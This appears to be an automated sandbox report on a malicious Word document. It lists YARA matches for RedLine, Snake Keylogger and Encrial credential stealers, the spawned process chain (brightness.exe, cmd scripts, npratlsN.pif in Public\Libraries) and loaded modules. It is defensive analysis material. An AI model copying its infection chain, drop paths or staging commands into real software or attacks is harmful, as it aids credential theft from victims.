Source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000D.00000002.3820648625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.3820791645.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000001.2446904495.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.3820808397.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000F.00000001.2369555463.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: npratlsN.pif PID: 7716, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: npratlsN.pif PID: 8008, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: npratlsN.pif PID: 8188, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@20/13@5/6

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02787FD2 GetDiskFreeSpaceA,

7_2_02787FD2

Source: C:\Users\Public\Libraries\npratlsN.pif

Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

13_2_004019F0

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02796DC8 CoCreateInstance,

7_2_02796DC8

Source: C:\Users\Public\Libraries\npratlsN.pif

13_2_004019F0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ ITS15235 (2).doc

Jump to behavior

Source: C:\Users\Public\Libraries\npratlsN.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{57951A01-A762-49B1-AC13-E110ED853DA1} - OProcSessId.dat

Jump to behavior

Source: PI ITS15235 (2).doc

OLE indicator, Word Document stream: true

Source: PI ITS15235 (2).doc	OLE document summary: title field not present or empty
Source: PI ITS15235 (2).doc	OLE document summary: edited time not present or 0

Source: C:\Users\Public\Libraries\npratlsN.pif	Command line argument: 08A	13_2_00413780
Source: C:\Users\Public\Libraries\npratlsN.pif	Command line argument: 08A	13_2_00413780
Source: C:\Users\Public\Libraries\npratlsN.pif	Command line argument: 08A	13_1_00413780
Source: C:\Users\Public\Libraries\npratlsN.pif	Command line argument: 08A	15_2_00413780

Source: C:\Windows\SysWOW64\brightness.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CD46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CD39000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2487189543.000000001DCB0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CD14000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DAE6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2618362842.000000002EA20000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DAA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DAD9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DAB4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028693000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PI ITS15235 (2).doc	Virustotal: Detection: 60%
Source: PI ITS15235 (2).doc	ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Nsltarpn.PIF "C:\Users\Public\Libraries\Nsltarpn.PIF"
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Nsltarpn.PIF "C:\Users\Public\Libraries\Nsltarpn.PIF"
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif

Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
